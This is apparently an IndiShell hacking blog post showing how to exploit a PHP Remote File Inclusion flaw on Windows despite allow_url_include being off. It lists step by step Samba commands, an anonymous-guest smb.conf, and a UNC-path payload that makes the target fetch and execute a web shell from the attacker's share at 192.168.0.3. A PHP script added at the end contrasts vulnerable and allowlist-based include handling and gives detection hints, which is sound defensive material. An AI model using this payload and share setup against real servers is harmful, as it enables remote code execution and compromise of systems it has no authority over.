PHP and SMB share file access

Pranaam to all _/\_

In this blog post I am going to demonstrate a technique for exploiting a Remote File Inclusion (RFI) vulnerability in a PHP application even when the PHP environment is configured not to include files from remote HTTP or FTP URLs. We will bypass the remote URL inclusion restriction by serving the web shell from an SMB share instead.

In the PHP configuration file, the "allow_url_include" directive is set to "Off" by default, which tells PHP not to include files from remote HTTP or FTP URLs and so prevents the classic Remote File Inclusion attack. But that restriction only applies to PHP's URL stream wrappers. When the application runs on Windows, a UNC path such as \\server\share\file.php is not a URL at all: the operating system resolves it as an ordinary filesystem path, so include() loads it even when both "allow_url_include" and "allow_url_fopen" are "Off". This behaviour can be abused to load a remotely hosted PHP web shell from an SMB share. (On Linux the backslashes are just characters in a filename, so the same payload does nothing unless the share has been mounted locally.)

When the vulnerable application tries to load the web shell from the attacker-controlled SMB share, the share has to allow access to the file without credentials: the connection is made by the web server's service account, which has no account on the attacker's machine. So the attacker configures the SMB server with anonymous (guest) read access. Once that is in place, the SMB server does not ask for any credential, and the PHP code of the web shell is included and executed by the vulnerable application.

Let's start. First I reconfigured the PHP environment and disabled "allow_url_fopen" as well as "allow_url_include" in php.ini, then configured the SMB server with anonymous read access, and finally exploited the vulnerable application once the share was ready.

Attack scenario outline

The vulnerable PHP application runs on Windows with "allow_url_fopen" and "allow_url_include" both set to "Off" and passes a request parameter to include(). The attacker runs a Samba server (192.168.0.3 in this lab) with a share that allows anonymous read access and places a PHP web shell in it. The attacker then sends the UNC path of the web shell as the vulnerable parameter; the application server connects to the share as guest over SMB, reads the web shell and executes it.

PHP environment settings

The machine hosting the vulnerable code has "allow_url_fopen" and "allow_url_include" set to "Off"; the screenshot of the current configuration was taken on PHP version 5.5.11. Before proceeding, let's make sure PHP really refuses Remote File Inclusion when we try to include the web shell over HTTP: the application throws an error and no inclusion happens when I try to include the PHP web shell from a remote HTTP host.

Configuring the SAMBA server with anonymous read access (Linux Machine)

Install the SAMBA server with the command below (as root):

apt-get install samba

Create the SMB share directory (in my case /var/www/html/pub/):

mkdir /var/www/html/pub/

Configure the permissions on the newly created share directory so that the guest account (nobody) can read it but nothing can be written into it:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

Run the command below to remove the default content of the SAMBA configuration file:

echo > /etc/samba/smb.conf

Put the content below in the file '/etc/samba/smb.conf'. "security = user" together with "map to guest = bad user" maps any username that does not exist on the Samba host to the guest account, which is why the web server's service account is accepted without a password; "guest ok = yes" with "read only = yes" exposes the share 'ica' read-only to that guest:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Now restart the SAMBA server to apply the new configuration specified in /etc/samba/smb.conf:

service smbd restart

Once the SAMBA server has restarted successfully, try to access the share and make sure the server is not asking for credentials. In my case the SAMBA server IP is 192.168.0.3, so I open the following path in Windows file explorer:

\\192.168.0.3\

Awesome, the SMB share is accessible without a credential prompt and shows that the directory 'ica' is present. (From the Linux side you can confirm the same with smbclient using an anonymous, no-password login against the 'ica' share.)

Hosting PHP web shell in SMB share

Now host the PHP shell in the directory '/var/www/html/pub', which backs the SMB share 'ica'. Once the shell is in place, open the share in Windows file explorer:

\\192.168.0.3\ica\

You will see the PHP shell present in the share directory; in my case it is box.php.

Attacking the File Inclusion vulnerable parameter

Perfect, let's pass the UNC path of the shell to the vulnerable parameter:

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

Dang Dang! The vulnerable PHP code fetched the web shell from the SMB share and executed it \m/ on the application server. We have bypassed the restriction and included a web shell hosted on a remote host.

A couple of caveats before relying on this in an engagement. The application server, not the attacker's browser, makes the SMB connection, so the server must be able to reach TCP port 445 on the attacker's host; egress filtering on a hardened network blocks this. Newer Windows builds (Windows 10 Enterprise and Education from version 1709, Windows Server 2019 and later) disable insecure guest logons in the SMB client by default, so the unauthenticated share above is refused unless the "Enable insecure guest logons" policy has been switched on; check the target's OS version before counting on this.

--==[[ With Love from Team IndiShell ]]==--

--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
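The bypass works because include() treats the UNC path as a local file, so a defence that only disables URL wrappers, or only blocks strings starting with http:// and ftp://, is not enough. The script below is an added example written for this page, not code from the IndiShell post or from any real application: it puts the vulnerable include pattern next to a naive scheme-blocking filter and a hardened allowlist resolver, and runs the payload from the walkthrough through all three. The page names home and about, the temporary pages directory and the three resolver functions are assumptions made for the demo; it needs PHP 7.1 or newer and runs from the command line with the php binary.

```php
<?php
// Added example for this page (not the original post's code). It contrasts
// the include pattern exploited in the walkthrough with a hardened version
// and feeds the page's payloads through both. Page names, directory and
// function names are assumptions for the demo.

// Hypothetical pages directory with two legitimate includes, created here
// so the script is self-contained (constructed sample data).
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_pages';
if (!is_dir($pagesDir)) {
    mkdir($pagesDir, 0700, true);
}
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'home.php',  '<?php echo "home page\n";');
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'about.php', '<?php echo "about page\n";');

// 1. The vulnerable pattern: the request parameter becomes the include path.
//    With allow_url_include=Off an http:// URL fails, but on Windows a UNC
//    path such as \\192.168.0.3\ica\box.php is a plain filesystem path to
//    PHP, so it is fetched over SMB and executed.
function vulnerable_resolve(string $page): string
{
    return $page;   // include($page) would follow in the real handler
}

// 2. A common but insufficient fix: deny only the URL schemes the developer
//    has heard of. The UNC payload and path traversal pass straight through.
function naive_resolve(string $page): ?string
{
    if (preg_match('~^(https?|ftp)://~i', $page)) {
        return null;
    }
    return $page;
}

// 3. Hardened: map the parameter to an allowlist of known page keys so user
//    input never forms a path at all. Anything not in the map is rejected,
//    so UNC paths, URLs and traversal all fail the same way.
function hardened_resolve(string $page, string $pagesDir): ?string
{
    static $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!isset($allowed[$page])) {
        return null;
    }
    $real = realpath($pagesDir . DIRECTORY_SEPARATOR . $allowed[$page]);
    $base = realpath($pagesDir);
    // Belt and braces: the resolved file must sit inside $pagesDir.
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Payloads: two legitimate values, the attack strings from the walkthrough
// and a traversal attempt (constructed test input).
$payloads = [
    'home',
    'about',
    'http://attacker/box.php',
    '\\\\192.168.0.3\\ica\\box.php',
    '../../../../windows/win.ini',
];

foreach ($payloads as $p) {
    printf("%-30s vulnerable=%-30s naive=%-30s hardened=%s\n",
        $p,
        vulnerable_resolve($p),
        naive_resolve($p) ?? 'REJECTED',
        hardened_resolve($p, $pagesDir) ?? 'REJECTED');
}

// Only the hardened resolver yields a path we are willing to include.
foreach (['home', 'about'] as $p) {
    include hardened_resolve($p, $pagesDir);
}
```

When run, the UNC payload is passed through unchanged by the first two resolvers and rejected by the third. The structural point is that the allowlist never lets the request form a path: there is nothing for allow_url_include, open_basedir or a scheme filter to catch because the input is a key, not a filename. On the defensive side, the same payload appears in web server logs as URL-encoded backslashes (%5C%5C) in the query string and on the network as an outbound SMB connection from the web server, neither of which a web server should normally produce.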